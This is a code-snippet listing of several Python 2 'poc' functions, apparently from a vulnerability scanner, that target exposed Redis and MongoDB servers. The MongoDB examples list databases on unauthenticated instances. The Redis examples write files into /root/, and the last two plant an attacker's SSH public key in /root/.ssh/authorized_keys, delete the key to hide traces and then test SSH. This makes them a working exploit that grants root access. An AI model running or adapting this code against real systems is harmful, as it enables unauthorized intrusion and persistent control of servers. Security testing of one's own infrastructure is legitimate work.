Exemplo n.º 1
0
def poc(url):
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379

    for web_port in [80, 443, 8080, 8443]:  # 判断web服务
        if checkPortTcp(ip, web_port):
            try:
                real_url = redirectURL(ip + ':' + str(web_port))
            except Exception:
                real_url = ip + ':' + str(web_port)
            break  # TODO 这里简单化处理,只返回了一个端口的结果
    else:
        return False

    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
        if 'redis_version' not in r.info():  # 判断未授权访问
            return False
        key = randomString(5)
        value = randomString(5)
        r.set(key, value)  # 判断可写
        r.config_set('dir', '/root/')  # 判断对/var/www的写入权限(目前先判断为root)
        r.config_set('dbfilename', 'dump.rdb')  # 判断操作权限
        r.delete(key)
        r.save()  # 判断可导出
    except Exception, e:
        return False
Exemplo n.º 2
0
def poc(url):
    url = host2IP(url)
    ip = url.split(":")[0]
    port = int(url.split(":")[-1]) if ":" in url else 6379

    for web_port in [80, 443, 8080, 8443]:  # 判断web服务
        if checkPortTcp(ip, web_port):
            try:
                real_url = redirectURL(ip + ":" + str(web_port))
            except Exception:
                real_url = ip + ":" + str(web_port)
            break  # TODO 这里简单化处理,只返回了一个端口的结果
    else:
        return False

    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
        if "redis_version" not in r.info():  # 判断未授权访问
            return False
        key = randomString(5)
        value = randomString(5)
        r.set(key, value)  # 判断可写
        r.config_set("dir", "/root/")  # 判断对/var/www的写入权限(目前先判断为root)
        r.config_set("dbfilename", "dump.rdb")  # 判断操作权限
        r.delete(key)
        r.save()  # 判断可导出
    except Exception, e:
        return False
Exemplo n.º 3
0
def poc(url):
	url = host2IP(url)
	ip = url.split(':')[0]
	try:
		if not checkPortTcp(ip,27017):
			return False
		if testConnect(ip,27017):
			return ip
	except Exception,e:
		return False
Exemplo n.º 4
0
def poc(url):
    ip = host2IP(url).split(':')[0]
    port = 27017
    try:
        if not checkPortTcp(ip, port):
            return False
        conn = pymongo.MongoClient(ip, port, socketTimeoutMS=3000)
        dbs = conn.database_names()
        return ip + ' -> ' + '|'.join(dbs) if dbs else False
    except Exception:
        return False
Exemplo n.º 5
0
def poc(url):
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        if not checkPortTcp(ip, 22):
            return False
        r = redis.Redis(host=ip, port=port, db=0)
        if 'redis_version' in r.info():
            key = randomString(10)
            r.set(key, '\n\n' + public_key + '\n\n')
            r.config_set('dir', '/root/.ssh')
            r.config_set('dbfilename', 'authorized_keys')
            r.save()
            r.delete(key)  # 清除痕迹
            r.config_set('dir', '/tmp')
            time.sleep(5)
            if testConnect(ip, 22):
                return True
    except Exception, e:
        # print e
        return False
def poc(url):
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        if not checkPortTcp(ip, 22):
            return False
        r = redis.Redis(host=ip, port=port, db=0)
        if 'redis_version' in r.info():
            key = randomString(10)
            r.set(key, '\n\n' + public_key + '\n\n')
            r.config_set('dir', '/root/.ssh')
            r.config_set('dbfilename', 'authorized_keys')
            r.save()
            r.delete(key)  # 清除痕迹
            r.config_set('dir', '/tmp')
            time.sleep(5)
            if testConnect(ip, 22):
                return True
    except Exception:
        return False
    return False